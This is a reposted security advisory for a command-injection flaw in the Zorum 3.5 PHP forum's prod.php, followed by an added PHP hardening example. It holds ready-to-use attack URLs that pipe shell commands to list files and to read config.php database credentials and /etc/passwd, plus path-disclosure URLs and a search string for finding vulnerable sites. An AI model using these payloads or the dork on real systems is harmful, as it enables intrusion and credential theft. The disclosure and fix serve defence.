GOOGLE HACKING TRICKS, LEARN SECRETS OF HACKING

Output Index Script

"Powered by Zorum 3.5"

Posted by Zul Afdal

Zorum 3.5 remote code execution PoC exploit

Software description: Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution.

Author site: http://zorum.phpoutsourcing.com/

1) Remote code execution

Vulnerable code, in the /gorum/prod.php file:

    $doubleApp = isset($argv[1]);
    …
    if( $doubleApp )
    {
        $appDir = $argv[1];
        system("mkdir $prodDir/$appDir");
    …

A user can execute arbitrary commands using the pipe character, for example:

http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la
to list directories

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php
to see the database username/password…

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd
to see the /etc/passwd file

2) Path disclosure

http://[target]/zorum/gorum/notification.php
http://[target]/zorum/user.php
http://[target]/zorum/attach.php
http://[target]/zorum/blacklist.php
http://[target]/zorum/forum.php
http://[target]/zorum/globalstat.php
http://[target]/zorum/gorum/trace.php
http://[target]/zorum/gorum/badwords.php
http://[target]/zorum/gorum/flood.php
and so on…

Googledork: "Powered by Zorum 3.5"

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/zorum.html
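
The root cause in the prod.php excerpt is that $argv[1] is interpolated into a shell command line unchanged. The following is an added example of a hardened form, not code from Zorum or from the advisory: create_app_dir() is a hypothetical helper, the sample names are constructed (two are the payload strings quoted above), and it assumes prod.php is meant to be run only from the command line, since it reads $argv.

```php
<?php
// Added example, not Zorum's code. create_app_dir() is a hypothetical helper;
// $prodDir and $appDir are the variable names used in the advisory's excerpt.

function create_app_dir(string $prodDir, $appDir): string
{
    // Allowlist: one path component made of letters, digits, '_' or '-'.
    // \A and \z anchor the whole string ('$' would tolerate a trailing newline).
    // This rejects '|', ';', spaces, '/', '..' and every other character a
    // shell or the filesystem treats specially.
    if (!is_string($appDir) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $appDir)) {
        throw new InvalidArgumentException('invalid application directory name');
    }
    $target = $prodDir . DIRECTORY_SEPARATOR . $appDir;
    // mkdir() is a direct filesystem call: no shell is spawned, so there is
    // nothing left to interpret metacharacters even if validation were wrong.
    if (!is_dir($target) && !mkdir($target, 0750)) {
        throw new RuntimeException('could not create ' . $target);
    }
    return $target;
}

// Assumption: the script is a maintenance tool. Refuse to run when it is
// reached through the web server instead of the PHP command line.
if (PHP_SAPI !== 'cli') {
    http_response_code(404);
    exit;
}

// Constructed demo: a scratch directory stands in for $prodDir.
$prodDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'prod_demo_' . getmypid();
mkdir($prodDir, 0750);
$created = [];
foreach (['myforum', '|ls -la', '|cat ../config.php', '../escape'] as $candidate) {
    try {
        $created[] = create_app_dir($prodDir, $candidate);
        echo 'created:  ', end($created), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', var_export($candidate, true), "\n";
    }
}
// Clean up the scratch directories created by the demo.
array_map('rmdir', $created);
rmdir($prodDir);
```

Only 'myforum' is created; the three other sample names are rejected before any filesystem or shell call is made.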